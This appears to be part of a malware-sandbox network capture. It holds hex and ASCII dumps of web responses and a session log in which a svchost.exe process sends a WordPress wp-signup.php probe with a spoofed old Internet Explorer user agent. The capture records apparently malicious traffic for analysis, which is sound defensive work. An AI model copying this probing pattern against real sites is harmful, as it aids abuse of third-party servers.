                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14748INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14764INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14780INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14796INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14812INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14828INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14844INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14860INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14876INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14892INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14908INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14924INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                                          Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14940INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14956INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                                          Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          66192.168.2.6537783.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6363OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: dataform.co.uk
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7092INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                          Keep-Alive: timeout=2, max=100
                                                                                                                                                                                                                                                                          Content-Length: 49049
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7093INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7095INData Raw: 4c 28 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 76 61 72 20 74 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 74 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 2c 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 66 6f 72 28 6f 3d 41 72 72 61 79 28 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 29 2c 74 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 72 3d 30 3b 72 3c 6f 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 3d
                                                                                                                                                                                                                                                                          Data Ascii: L()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=
